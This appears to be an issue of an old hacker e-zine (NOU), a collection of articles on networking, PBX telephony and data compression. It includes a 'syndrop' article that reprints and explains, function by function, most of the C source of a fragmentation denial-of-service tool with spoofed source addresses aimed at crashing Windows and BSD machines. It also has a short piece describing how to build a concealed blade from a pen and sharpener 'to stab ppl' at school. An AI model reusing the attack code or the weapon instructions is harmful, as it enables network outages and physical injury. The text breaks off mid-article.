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'. ).' )/| \ ` ` | \| | \ | | '.| | \ '\__ `-._ '. _ \`;-.` `._ \ \ `'-._\ \ | \ ) \_\ *********************************************************************** Introduction......................................lusta Switch Back Networks vs Hub Setup.................lusta Make Your Own Weapon..............................exult666 Syndrop Explanation...............................Ezzrealiteh Lines vs. Trunks..................................pbxphreak Data Compression..................................virogen IRC Crap..........................................awnix Sneaking Around...................................max Experts or Fakes?.................................mosthated IRC Girls.........................................lusta Our Roots Our Rights..............................blackice Vulnerabilities in Win95/98 and NT boxes..........colevert Intro to MySQL....................................chrak ******************************************************************************* Introduction to Nou Nou (nations of ulysses), is a collection of people that i basically con'd into helping with this zine hehe. Although most everyone's been around longer than I have, and is much more knowledgeable about computers, I'm sure that we will still be able to offer informative, if not at least interesting reading. Our channel is #nou on efnet, or you can email us at nou@hotmail.com. Thanks for your interest. Ciao! ~lusta ************************************************************************** Switch Back Networks vs. Hub Setup This article will offer you the understanding of the difference between a hub and a switch. Also depending on your needs, you will be able to determine which choice is ideal for your network. After researching, I found that switches offered a lot more than a hub in areas of security and reduction of traffic, while a hub is available at a much lower cost. Within a network, a hub is a central connecting device that joins communications lines together in a star configuration. Connecting units that add nothing to the data passing through them would be a passive hub. Active hubs, also sometimes called multiport repeaters, regenerate the data bits in order to maintain a strong signal. Hubs are mandatory in 10BaseT twisted pair Ethernet as well as Token Ring networks. With passing data, a hub is only able to send an incoming packet to all ports, If a packet is sent to one port of the hub, that packet is also bounced to all 7 other ports. A hub just bounces packets, an example could be like a bunch of lines being hardwired together along with an amplifier. Switches are mechanical or electronic devices that direct the flow of electrical or optical signals from one side to the other. A switches with more than two ports, such as a LAN switch or PBX, are able to route traffic. A switch can direct a packet to the port it's destined to. The way a standard level 2 switch works, is this - when a computer wants to communicate over IP it sends a broadcast packet out called an arp request. It's like saying, "Who owns"?, and the computer that owns it replys with, "I do, and my MAC address is 80:FE:A5:5B:12". So basically, it remembers the machine hooked up to a specific port's MAC address. Amount of traffic is saved by use of a switch, because when packets are received through a switch back, the switch is able to direct the packet to the direct port. Let's say that one computer is transmitting at 50% capacity (50% of the network capacity (10bT would be 5mbits/s)), since all of those packets are hitting all the other computers they are limiting the bandwidths of the other machines on the hubs as well. This will not make a large difference unless running a large network of maybe 100 stations or more. Switch Back offers a higher level of security, since all packets are bounced to all machines on a hub, it is possible for a "hacker" to put the ethernet card on a computer outside the source and destination machines into promiscous mode. Basically, it is like eavesdropping in on a conversation (also known as "sniffing"), observing passwords in an unencrypted session. The main reason a hub is usually chosen over a switch is for cost purposes. A switch can cost up to 50-80% more than a hub, depending on the amount of ports. While at a higher cost, a switch definately proves to be an ideal choice with a large network. It is apparent why a switch can perform better, and provide a higher level of security. ~lusta (Special thanks to icesk, slawz, and Javaman for their contributed information.) ************************************************************************************** Make Your Own Weapon pen razOr...eXult666 | this iz just shit on how to make a pen raz0r a real cool weapon to make when ur bored at skool. u stab ppl with it and the such. get: felt tip pen metal pencil sharpener (the 1z wif the screw-on bladez) take the felt tip pen and remove the felt tip end and the ink thing inside of it. with a screw driver remove the blade from the pencil sharpener. take the blade and stick it in the felt tip where the felt tip would go: ,--------------------------.__ _____ ----------. < __/____/ > `~~~~~~~~~~~~|~~~~~~~~~~~~~` | ~~~~~|~~~~` felt tip blade lid *************************************************************************************** Heh, heres my attempt to break down a simple newker (syndrop, a teardrop variant) as my article for NOU... You have to understand that I dont intend to explain C, I just intend to explain how this DoS attack works on a source level. You will require a decent understanding of C and TCP/IP before this is of any use to you. Aiight, first off, the whole idea behind syndrop is to fuck with the BSD TCP/IP stacks frag exploit.. And the MS windows tcp stacks syn(*) (* = Explained Later) sequence bug.. at the same time! Heh. So, lets see how it does this... I'm gonna omit the header files beacuse they dont really help explain anything. Okay.. first off we got some macros --------------------------------- #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi <3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define TCPH sizeof(struct tcphdr) /* TCP header */ #define PADDING 0x14 /* datagram frame padding for first packet */ /* JD Change pad size to 20 decimal. */ #define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */ #define COUNT 0x11 /* Linux dies with 1, NT is more stalwart and can * withstand maybe 5 or 10 sometimes... Experiment. * syndrop: gotta hit it at least 8 times. overflowing * some static sized buffer. fools. */ --------------------------------- The author well documented alot of the source, so the comments should be pretty self explanitory for that part.. I'm gonna skip the prototypes, because they dont help explain how it works.. just more C formality --[ beginning of main() ]------------------------------- int main (int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; u_long s_start = 0, s_end = 0; struct in_addr addr; fprintf (stderr, "syndrop by PineKoan\n"); if ((rip_sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror ("raw socket"); exit (1); } if (setsockopt (rip_sock, IPPROTO_IP, IP_HDRINCL, (char *) &one, sizeof (one)) < 0) { perror ("IP_HDRINCL"); exit (1); } if (argc < 3) usage (argv[0]); if (!(src_ip = name_resolve (argv[1])) || !(dst_ip = name_resolve (argv[2]))) { fprintf (stderr, "What the hell kind of IP address is that?\n"); exit (1); } --------------------------------- Now, as you can see, variable "rip_sock" is a handle to a raw socket.. if you dont know what they are, they're formless/protocol-less socket handles, where you have to do everything, from the ip header, to the protocol header, and the body of the data.. this is how you can build the packet that fucks with the tcp stack. The setsockopt() call begins to define to the operating system that this socket (handle rip_sock) is a IP socket and IP header will be in the data so the os doesnt need to handle that. A little bit lower down the source, you notice the two calls to name_resolve for the variables src_ip and dst_ip, they are variables holding the attackers fake ip, and victims resolved ip, respectfully. --------------------------------- while ((i = getopt (argc, argv, "s:t:n:S:E:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short) atoi (optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short) atoi (optarg); break; case 'n': /* number to send */ count = atoi (optarg); break; case 'S': /* SYN sequence start */ s_start = atoi (optarg); break; case 'E': /* SYN sequence end */ s_end = atoi (optarg); break; default: usage (argv[0]); break; /* NOTREACHED */ } } --------------------------------- The while loop makes repeated calls to getopt() until it gets EOF message. Now, if you dont know anything about getopt(), it handles switches from the command line, and makes it easy to write code for 'em --------------------------------- srandom ((unsigned) (time ((time_t) 0))); if (!src_prt) src_prt = (random () % 0xffff); if (!dst_prt) dst_prt = (random () % 0xffff); if (!count) count = COUNT; fprintf (stderr, "Death on flaxen wings:\n"); addr.s_addr = src_ip; fprintf (stderr, "From: %15s.%5d\n", inet_ntoa (addr), src_prt); addr.s_addr = dst_ip; fprintf (stderr, " To: %15s.%5d\n", inet_ntoa (addr), dst_prt); fprintf (stderr, " Amt: %5d\n", count); fprintf (stderr, "[ "); --------------------------------- Now, this call to srandom() seeds the PRNG (pseudo-random number generator). And then the two if's check to see if destination and source ports are set, if they arent, it generates a random number between 0 and FFFF (65535) Then, a cute message is printed ("Death on flaxen wings:"), the sockaddr structures are filled, and information regarding the victims host is printed. --------------------------------- for (i = 0; i < count; i++) { send_frags (rip_sock, src_ip, dst_ip, src_prt, dst_prt, s_start, s_end); fprintf (stderr, "b00m "); usleep (500); } fprintf (stderr, "]\n"); return (0); } --[ end of main() ]------------------------------- Oh baby, there it is, the loop of death, pumping out (count) frags and printing a cute "b00m" message for every one.. notice the 500 ms sleep =) Now, I'm gonna jump around the source, and talk about the name_resolve() function. --[ begin of name_resolve() ]------------------------------- u_long name_resolve (u_char * host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr (host_name)) == -1) { if (!(host_ent = gethostbyname (host_name))) return (0); bcopy (host_ent->h_addr, (char *) &addr.s_addr, host_ent->h_length); } return (addr.s_addr); } --[ end of name_resolve() ]------------------------------- Okay, name_resolve() does two things.. and is actually a pretty useful function. First off, it converts the entered host, or at least, attempts to, into an sockaddr formatted address, if this fails, it then attempts to resolve the given host into a sockaddr formatted address via the gethostbyname() function. Now I'm gonna jump around one more time, and handle the last bullshit function left, usage() --[ begin of usage() ]------------------------------- void usage (u_char * name) { fprintf (stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]", name); fprintf (stderr, "[ -S sequence_start] [ -E sequence_end ]\n"); exit (0); } --[ end of usage() ]------------------------------- This function isn't even worth my time to talk about, because it just tells ya how the fuq to use the compiled binary.. Heh, I spose I just talked about it anyways =) And now.. finally the part that does the magic of syndrop, send_frags() --[ begin of send_frags() ]------------------------------- /* * Send two IP fragments with pathological offsets. We use an implementation * independent way of assembling network packets that does not rely on any of * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD). */ void send_frags (int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt, u_long seq1, u_long seq2) { u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; --------------------------------- The author drops a fairly technical description of what the function does, and to a good coder, it makes perfect sense, but I'm gonna break down the function anyways =) Now here, all he does is begin to setup a sockaddr structure with proper infos setting the address family (AF_INET), the source port (src_ptr) and the victims ip (dst_ip) --------------------------------- /* * Grab some memory for our packet, align p_ptr to point at the beginning * of our packet, and then fill it with zeros. */ packet = (u_char *) malloc (IPH + UDPH + PADDING); p_ptr = packet; bzero ((u_char *) p_ptr, IPH + UDPH + PADDING); /* Set it all to zero */ --------------------------------- Memory is now allocated for this packet header + body, where he adds up the amount needed (IP_HEADER_SIZE + UDP_HEADER_SIZE + PADDING) and sets his pointer (p_ptr) to the address of the allocated memory.. Then, this memory buffer is zero'd out (all bytes are set to zero). Okay now, here comes the important stuff, where the packet is built in memory. --------------------------------- byte = 0x45; /* IP version and header length */ memcpy (p_ptr, &byte, sizeof (u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *) p_ptr) = FIX (IPH + UDPH + PADDING); /* total length */ p_ptr += 2; *((u_short *) p_ptr) = htons (242); /* IP id */ p_ptr += 2; *((u_short *) p_ptr) |= FIX (IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *) p_ptr) = 0x40; /* IP TTL */ --------------------------------- So, now, right as the first byte, he sets the ip version, and header length since these are two 4 bit fields, he combins them into one 8 bit number and sets the first byte. You'll also notice the repeated "p_ptr += 2;" lines, those increment where within the memory "buffer" that the data is being written to. Next, the IP id, and frag flag (the key behind the *drop newks) and the time to live (TTL) are set. --------------------------------- byte = IPPROTO_TCP; memcpy (p_ptr + 1, &byte, sizeof (u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *) p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *) p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *) p_ptr) = htons (src_prt); /* TCP source port */ p_ptr += 2; *((u_short *) p_ptr) = htons (dst_prt); /* TCP destination port */ p_ptr += 2; *((u_long *) p_ptr) = seq1; /* TCP sequence # */ p_ptr += 4; --------------------------------- This time, you notice the IPPROTO_TCP flag is set via the "byte" variable and memcpy'd into the structure, this seems to be because its -1- physical byte (8 bits) long. The pointer is then incremented + 4, the skip the checksum calculation, beacuse thats still done by the kernel, even in a raw socket. The fake attackers ip, and victims ip's are set, and the attackers fake port and victims destination are also set, and a fake sequence number.. not like it makes a diffrence, since its only a SYN(*) anyways (* = Explained later on) --------------------------------- *((u_long *) p_ptr) = 0; /* ack */ p_ptr += 4; *((u_short *) p_ptr) = htons (8 + PADDING * 2); /* TCP data offset */ /* Increases TCP total length to 48 bytes Which is too big! */ p_ptr += 2; *((u_char *) p_ptr) = TH_SYN; /* flags: mark SYN */ p_ptr += 1; *((u_short *) p_ptr) = seq2 - seq1; /* window */ *((u_short *) p_ptr) = 0x44; /* checksum : this is magic value for NT, W95. dissasemble M$ C++ to see why, if you have time */ *((u_short *) p_ptr) = 0; /* urgent */ if (sendto (sock, packet, IPH + TCPH + PADDING, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) == -1) { perror ("\nsendto"); free (packet); exit (1); } --------------------------------- Ok, this time after the SEQ(*) was set, a fake ACK(*) is also set, again useless because its only a SYN. The TCP data offset is then calculated, adding upto 48 bytes, and the mark syn flag is set.. the window is calculated from the previous and current SEQ's (which again, are useless, but required), and a strange magic (a constant, required number) is set, in this case, I believe to identify that the orginating tcp stack was NT/95... this again is crap, since we know it compiles on Linux or BSD variants =) An urgent flag is set, but you notice, theres no incrementing of pointers after the point of setting the flag TH_SYN, could this be one of those purposely done fuckups to insure newk kiddies dont use his tewl.. if this is so, the patch is very obvious, if you have even a half of a brain. But I wont give it out if I am right, cuz I dont want the newk kiddies using this shit too. And our friend, sendto() is now called, he takes this big ol' data buffer, and pumps it out the NIC(*), and into the world.... Notice theres JUST a bit of error checking =) --------------------------------- /* We set the fragment offset to be inside of the previous packet's * payload (it overlaps inside the previous packet) but do not include * enough payload to cover complete the datagram. Just the header will * do, but to crash NT/95 machines, a bit larger of packet seems to work * better. */ p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */ *((u_short *) p_ptr) = FIX (IPH + MAGIC + 1); p_ptr += 4; /* IP offset is 6 bytes into the header */ *((u_short *) p_ptr) = FIX (MAGIC); p_ptr = &packet[24]; /* hop in to the sequence again... */ *((u_long *) p_ptr) = seq2; /* TCP sequence # */ if (sendto (sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) == -1) { perror ("\nsendto"); free (packet); exit (1); } free (packet); } --------------------------------- This block just peforms modding of the last packet, flixing up the IPTL and the IP magic (hrrrm..), the b.s. SEQ is also changed, and this new packet is fired off into the wild tcp/ip jungle.... --[ end of send_frags() ]------------------------------- Well, as I pointed out a couple of times, I'm gonna explain some things at the end, some terminology.. so here it is: SYN : Part of the TCP 3 part handshake, this packet tells the destination that you intend to open a socket to the specified port. ACK : Another part of the TCP 3 part handshake (when its a packet), and also used for control. ACKnologing the reciept of the previous packet. SEQ : Packet sequence number. NIC : Network Interface Card, to the average person, this is refered to as an Ethernet card, because most people have ethernet networks (generally). However there are other types of NIC's, but this aint about NIC's right now, this is about syndrop =) Anyhow, I hope this comes to help someone, at least, learn and expand their small minds regarding tcp and helps them understand at least how they're newkin (or attempting)someone.. It doesnt make newking any less lame, nor the person however. Maybe I'll write something next time.. so stick around for the next issue, Peace out =) ~ Ezzrealiteh *************************************************************************************** Lines versus Trunks by pbxphreak The term line refers to more than one type of circuit in most cases, it includes a connection configured to support a normal voice calling load generated by one individual. But in the case of a PBX, the term line is usally corresponds to one connection from the PBX to a desktop. In the case of a centrex, a line is normally one physical connection from the customer site to the CO. With a key system, a line corresponds to one telephone number, but it might also be reffered to as a trunk. The term trunk normally refers to a circuit configured to support the calling loads generated by a group of users. Possibly numbering many thousdands. Usually a general-use circuit from a PBX to a CO would be described and billed as a trunk. Connections between COs or offices higher in the network would also be referred as trunks. These trunks are physically identical to lines. The ability of any given switching system, such as a CO or a PBX, to establish connections is limited. For example, although a PBX might be able to support 200 connections or ports, it might only actually provide 80 paths at one time. In such a case, if 80 people were to connect to 80 other people (some of them possibly off site), that would account for 160 of the ports, and if any of the remaining telephones or ports attempted to access service, the would fail. That is, a user could pick up the telephone and not recieve a dialtone. Some systems are configured so that no such failures can happen. In the previous example, if only 160 physical connections were made to the PBX, then it could provide service at the same time to all of them. Such a configuration is described as blocking. Normally, a PBX's connections to the CO are configured so that a much higher utilization than 10 minuties per hour is achieved on those ports, and a primary benefit of a PBX is the ability to buy fewer telco connections than one has telephones. The CO must be configured so that it can provide connection services to such trunks at this higher utilization rate so it uses more of the CO's overall switching and connection capacity (CO's are not normally configured as nonblocking switches). So, the telco will naturally bill a PBX trunk at a higher rate than a single business line, even though the PBX trunk might be physically identical to that single line. The final comparison of lines versus trunks would be as follows. A line is an end point from a central switching service, such as a Co or a private automated branch exchange (PABX). The line is an end point on the pair of wires regardless of where it resides. A line carries one single conversation at a time on the physical channel capacity. It is a billable location for the telephony companies. A trunk connects two switching systems. The trunk might be a single circuit carrying a single call at a time, or might be a bundled service that is multiplexed and carries multiple conversations going at the same time. The difference is that a trunk will be used for switching and routing decisions from the switching offices (CO, or PABX). The trunk is continually rather than occasionally used. It is a billable address that can have additional subaddressing capabilities behind it. In the telephone company world, it is the connection between and among other offices. In the private user world, it might be a sinle connection to the PABX from the CO. These disctinctions offer some variations in billing and utitilizing them. Below are some common configurations. DID: --- DID refers to direct inward dialing, from a callers point of view, this service is in place if the caller can dial a 10 digit number rom the outside and reach a specific person without an operator (live or automated). Centrex normally supports this capability without andy additional configuration, and everyone has their own telephone number. A true key system (where telephone numbers are normally shared) can only allow DID if any given telephone number has only a single apprearance. But DID is ually referred to in the context of a PBX. It is a specific PBX feature that musyt be enabled and configured, with elements set up both within the PBX and also with the telco. Consider as an example a new site intended to support 1100 employees, each with his/her own telephone connected to a PBX. The first step in arranging DID is to reserve the telephone numbers for all those employees. Lets say the main company telephone number is 555-1234. The telecommunications manager will request a block of DID numbers from the telco probably about 2000. The telco might say, "Your DID numbers are 555-2200 through 555-4199". Notice that while there is a good chance the block will have the same exchange as the main number, it probably will not inslude the main number. The company will pay for those numbers on a montly basis, but they will not cost anywhere near as much as actual telephone lines. So far the only thing arranged is the reservation of the block of numbers themselves These numbers will not be given out by the telco to anyone else. The telecom- munications manager will assign each employee one of the numbers in the DID block. Next, the telecommuncations manager must determine how many trunks (or DID lines) in the trunk group will be required to support the calls from outside to the companys employees. These are inbound only, and are in addition to the normal in/out or inbound trunks that serve the main operator, so they must be engineered to a very low level of blocking. With DID, the telco passes on to the customer PBX the responsibility of handling answer supervision. Eg. Busy signals. So if an external customer calls "Jane" at extension 2313, the customer will dial 555-2313. The telco CO will seize the next available trunk in the DID group and signal along that there is a call for extension 2313. At that point if extension 2313 is busy, the PBX must deal with it, and the CO is merely passing along the signals. Possible PBX actions include forwarding to a message center, generating a busy signal, or forwarding the call to a specified alternate extension. DID is most often used to reduce or eliminate the manpower required for a central answering position. The more calls customers can place directly, the fewer must be answered by the company operator. On the other hand, some companies prefer to have all incoming calls answered by someone trained in the way the company wants its telephonees to be answered. DOD: --- DOD refers to direct outward dialing. If an employee can dial and reach an outside number without and internal operator, then the company has implemented DOD. In the past, when old telephone systems were available with less technology, it was not uncommon for a company to route all of its outbound calls through an internal operator. The operator's responsibility was both to screen calls and to route the calls over the right facilities, for examples a WATS line. (see below for WATS line). With the advent of modern PBX's and Centrex, such limitations can be programmed on a telephone by a telephone or even user-by-user basis, eliminating the need to involve an operator in inbound calls. DOD is a term not often used these days because few companies consider not providing it. FX: -- FX refers to a foreign exchange circuit. Foreign refers to a CO other than the local Co, not to a location outside the country. Consider the case of an airline that wishes to locate all of its reservation clerks in Atlanta. It cannot expect all of its customers to pay long distance charges to make reservations. What are the alternatives? One possibility is a group of 800 circuits. It will probably have a large number of those, but 800 trunks cover large areas (and are prices accordingly). What about service for customers calling from large citys like Chicago? Perhaps a more focused service might be more cost effective. Think of an FX line (or trunk) as two-thirds of a dedicated point to point connection. It starts at the customers location, connects to the local CO and extends from there to another foreign CO anywhere in the country. There is a fixed montly charge for all that mileage, but there are no usage-sensitive charges for these miles. At the foreign CO, it is open. It has a telephone number associated with that foreign CO. Calls made to that number ring at the customers lcoation. Calls made from the customers location over the FX line to proceed to the foreign Co, incurring only local charges for the call from the foreign Co to the called location. FX lines are often used by companies to provide local numbers that customers can call in cities where the companies do not in fact have offices. In the airlines case, it could arrange a group of FX lines from its Atlanta offices to a Chicago CO. All of thelines could share one Chicago local telephone number. People from anywhere could call the number, but normally only people in Chicago would, because it would appear only in their telephone book, and it would be a local call only for them. If the airline wished to allow it, service representatives could also place calls from Atlanta to Chicago over the FX lines. The calls would be billed though they were placed within Chicago. Perhaps calls notifying customers of changing flight information might be places in this way. OPX: --- OPX refers to off-premises extension. An OPX line permits a telephone not a company's location to function to all intents and purposes as though it is located at a company's location. This capability becomes particularly interesting with the recent increase in telecommuting. Suppose an employee plans to work at home. One of the problems to overcome in such a case is the isolcation such a worker might experience. Providing the employee with a telephone that look slike an internal line at the company might help to reduce the problem. Others calling the line within the company will dial an internal extension, which will ring at the employees home, and if the employee whishes to make a long distance call, he/she ually just dials 9 and then the rest of the number just as at a desk at the company's location. As with an FX line, an OPX connects from the company's location to the local CO then continues via whatever connecting Co's are neccassary until it terminates directly on at telephone at another location. A key difference from an FX, is that on the PBX and OPX is connected and configured as a telephone rather than a trunk. This results in a limitated type of service provided and normally only an analog telephone can be used at the end of an OPX because the digital signalling between a PBX and its old style telephones will probably not successfully make it throught the various analog and digital circuits that make up the OPX. This limitation is not normal. It just imposes on the telecommunications manager the need to configure the PBX to support a certain number of analog telephones as well as the digital telephones that might be used in house. Tie Lines: --------- A tie line also sometimes called a tie trunk refers to a private point to point circuit used to connect to voice facilities. For example, a decicated link between customers PBXs at two different locations would referred to as a tie line. Other examples of tie lines might be a link between a PBX and a centrex sysem, or one between two centrex systems. In all of these cases, it would be equally correct to refer to the circuits as private or leased lines. If ones of the connected systems is not a voice system, the term tie line would not be used. Tie stands for terminal interface equipment. WATS: ---- WATS is an abbreviation for wide area telephone service. WATS lines come in two flavours: in-WATS and out-WATS. Another name for in-WATS is 800 service. When most people refer to a WATS line, they mean and out-WATS facility. Both services are merely billing arrangements for reduced billing of long-distance calls based on a fixed montly free and discounts for larger calling volumes. 800 service also has the characteristic of reversing the charges to the called party. In the past, WATS lines have been separate facilities (physically identical to local PBX trunks or private lines). Their coverage was also banded, and a user may have had a WATS line that only reached adjacent states, or all of the lower 48 states, or some intermediate variation. For out-WATS, either the PBX had to be smart enough to recognize the dialed area and choose the correct outgoing facility or users had to dial special codes to select the right WATS line. WATS service has never been free, although some of the older tariffs did specify certain volumes aove which all calls were free, which was very large. Those tariffs are long gone and all calls are now charged on a per minute basis. The only factor is the per minute charge, which does decrease as the calling volume increases. One significant improvment is that WATS-type volume discount billing can now be setup on existing trunks, no longer are seperate facilities into the local CO required for such an arrangement. Private Line: ------------ Any circuit leased from a crrier from point on one customers premises to another point on a customers premises (even the same premises) can be described as a private line circuit. If an organization builds its own facilities(eg. a mircowave link across a big city), these facilties would also be described as private circuits. In either case, the alternative is normally a dial-up link. Many factors go into the decision as whether to setup a private facility. Some reasons why a company might setup a private link include: - Private analog circuits can be tuned for higher performance than dial-up facilities can. Both in terms of speed and reliability. - Many types of digital facilities are only available on private basis. - Management and troubleshooting of private facilities can be more tightly controlled than in dial-up enviroment. - High volume of calls or data would generate higher charges on the public dial network than on a non usage sensitive private network. Reasons to go with public dial network include: - Volumes of calls or data too low to justify a leased link. - Unwillingness or inability to coordinate and manage a private network. Like do you really want to be your own telephony company? I think not :) - A large number of small locations that would be uneconomical to connect with private links. With few exceptions, there is not a "right" descision on this issue. What might make the most sense today might be uneconomical tomorrow. A classical example of this kind of change is the decision as to whether to build a private voice communications network of tie lined connected PBXs which is called a tandem network. My Comments on Line and Trunk Networking: ---------------------------------------- Some of us might rememebr the early days of competition in the long distance arena. Remember the way we had to conenct to the alternate long-distance suppliers, like Sprint and MCI. A customer might sign up with a long distance supplier other than AT&T prior to 1984. This new customer of the competitors was offered several discounts over the long distance tariffed rates from AT&T. So that the customer could use the service, the long distance supplier would issue an 800 number to call its network, or a special number. This special number was a seven digit telephone number that could be a regular local number in the area, a 950-XXXX number or foreign exchange telephone number from a major area. The choices were based on the density of the carrier's service in the customers area. The customer would issue this telephone number to all internal users. Along with the 7 or 10 digit telephone number for entrance into the carriers network (I will use MCI from this point on for simplicity), another 10 digit number, called an autorization number, was issued. THis might be an unique number for every indivdual in the organization or a global number used by the entire organization. The caller now wants to make a long distance call from his/her office. So the sequence begins like this: - Pick up the phone and get a dial tone, then dial 9 for an outside line. - Dial the MCI toll free 800 number - Wait for connection. As the call proceeds, a ring tone is heard and then the MCI system answers and provides a computer tone which sounds much like steady high pitched tone. - On getting the computer tone, dial 1234567890 or wahtever 10 digit authorization number is assigned to the organization. - After the computer acknowledges the 10 digit authorization code it will return a dial tone to you. - Now dial the 10 digit telephone number of the party you with to speak with Eg. (410)671-8192. - Wait for the call to proceed and ring. Hope and pray that the call is answered and the line is not busy and is clear enough to hold a conversation on. Otherwise, start all over from square one. Users would obviously become very frustrated with this procedure. This is especailly true if the called parties were busy or if the user (for instance a telemarketing group) needed to make multiple calls. The need to dial 32 or 33 digits just to get a call through was frustrating. Especially since the users did now follow the company guidelines and dialed AT&T directly, they only had toi dial 12 digits. This was significant, particularly when there were thousands of calls being made per month. The accumulated waste of time might have cost the organizations more in productivity losses than MCIs service saved them. So why did MCI require all this digits in the past? The answr is simple. They had no choice. When competition first began, AT&T was the owner of the Bell system. To preclude the competitive threat, AT&T controlled how the network was set up. MCI had to rent telephone li nes from the local Bell telephone company. At the central office, these lines were connected from the CO to the MCI computer. THe calls was a completed call the minute the computer answered the incoming request. MCI did not get any of the information that is passed along from CO to CO or from CO to long distance supplier, becuase they were on the wrong side of the switching system. They were on the line side, not the trunk side. AT&T was on the trunk side of the switch, so call the caller ID information was paseed from switch to switch and no extra digits were required. When the Bell system was broken apart from the AT&T network, then equal access was allowed. Prior to that, AT&T controlled the network and made sure that equal access would not be a reality, or they priced the equal-access connectivity so hight that no vendor could afford it. Now that things are equal in the eyes of carriers such as MCI, Sprint, LDDS Worldcom, etc. They can all be connected to the trunk side of the system. Now caller ID information, called automatic idenfication of outward dialed or automatic number identification (ANI) and many other names is passed on to any carrier that is connected to the local or toll switches on the trunk side of the network. Calls are passed from switch to switch, routed through the network to and end point before termination takes place. The world is a better place for this. MCI and its peers are now all able to offer the same limited dial sequence that AT&T has always enjoyed. Now they get even better access to the systems and are offered services called feature groups, allowing for flate rate billing, call screening, and multiplexed services on high speed trunks. This makes them as attractive as any of the long distance services that they were competing with in the past years. Conclusion: ---------- This concludes my article. I hope you had fun reading. Cya next time :) ******************************************************************************** Data Compression ~ virogen There are two basic types of compression, dictionary and statistical. Dictionary compression relies on the assumption that most data will contain sequences of bytes (hereafter called phrases) that are repeated more than once. Statistical compression calculates the odds of each symbol (such as a byte) and encodes the symbols with the most probability into fewer bits than those with the least probability of occurrence. A hybrid of both dictionary and statistical encoding is often the most optimal approach. This article will be an brief introduction to the most popular dictionary algorithms, as well as some optimizing and other techniques. I'll try to make things sound as simple as they really are. BE WARNED that I wrote this article up pretty quickly, and it may contain inaccuracies.. if so, then pat yourself on the back for at least recognizing the inaccuracies. Dictionary Based Compression Algorithms ============================= Lempel and Ziv are the founders of dictionary based compression; most dictionary compression algorithms are derived from their LZ77 or LZ78. Trying not to get into too many details about all variants of LZ77 and LZ78, I will only describe the most commonly used of each class. LZSS ------ LZSS is an LZ77 variant which encodes a phrase that has already occurred once in the source data as an index to that phrase and its length. Bytes which have not already occurred in the source data, or cannot be represented in fewer bits by encoding a codeword (index/length combination), are encoded as literals. Obviously, this requires a control bit to specify whether a literal or index/length combination follows. For example, if we have the following data: ABCDABCCDAB LZSS would encode it as follows: ABCD[4,3][5,4] The most simple LZSS compressor may use 12bit indexes and 4 bit lengths, allowing for a 4096 byte window and up to 16 byte lengths. Assuming that is the case, the above example would save 18 bits: 11*8 = 88 bits - (4*8)+(16*2)+6 = 70 bits Clearly, this is the number of bits in the literals, plus the number of bits in the two codewords, plus the 6 control bits. LZW ----- Lempel-Ziv-Welch is an expansion of LZ78, which builds a dictionary during compression and decompression and stores only the entry of the member in that dictionary instead of an index/length pair as LZ77 does. LZW is patented by Unisys and IBM (there was some confusion at the patent office) and is used in GIF compression, unix compress, and v.42bis. The primary advantage of LZW is compression speed over the LZ77 class. LZW emits only codewords, it does not emit literals. This means that at the start of compression or decompression, the dictionary must be initialized to the 256 possible bytes. Every time a codeword is emitted, that dictionary item plus the next byte are added to the dictionary. For example: AABAAC byte 0 - emit 65 add AA to dictionary as member 257 byte 1 - emit 65 add AB to dictionary as member 258 byte 2 - emit 66 add BA to dictionary as member 259 byte 3 - emit 257 add AAC to dictionary as member 260 byte 5 - emit 67 Yielding: [65][65][66][257][67] The decoder lags one step behind the encoder in building the dictionary, storing the previous dictionary item plus the current byte as a new dictionary entry. Decoding of the above example would be; codeword 0 65 - emit 'A' first item, don't add to dictionary codeword 1 65 - emit 'A' add AA to dictionary as member 257 codeword 2 65 - emit 'B' add AB to dictionary as member 258 codeword 4 257 - emit 'AA' add BA to dictionary as member 259 codeword 5 66 - emit 'C' add AAC to dictionary as member 260 Once your dictionary becomes full (the size of which is determined by the number of bits you chose to represent codewords by), you can quit adding members (freezing the dictionary), throw the entire dictionary out, or rotate out the oldest or least used members. Optimizing Dictionary Based Compression --------------------------------------- Speed ====== Doing a linear search for phrases in the LZ77 class of compressors is clearly not optimal. The best approach is to store the locations of words in the window in a binary tree or linked list, and traverse the tree or linked list to find the offsets of those words. For example, if you were looking for a 3 byte phrase 'VGE', you may reference the linked list containing the offsets of all occurrences of 'VG' and do a compare at each location. It is also a optimal to have your phrase compare function find the largest match at any given offset. Rather than just say "Yes, I've found a 3 byte match" and then search for 4 byte match, you would want to have your phrase compare function return the size of the largest match at any given position, and then search for that size+1 on the next iteration of the phrase search loop. In the LZ78 class, storing hashes of the dictionary members will be much faster than string compares. Size ===== Encoding of codewords into as few bits as possible, yet maintaining a large window or dictionary size is cleary important. If you use static codeword sizes, you want to strike some balance. For example, a 4k window will require 12 bit indexes, while a 64k window will require 16bit indexes. While the 64k window would yield more 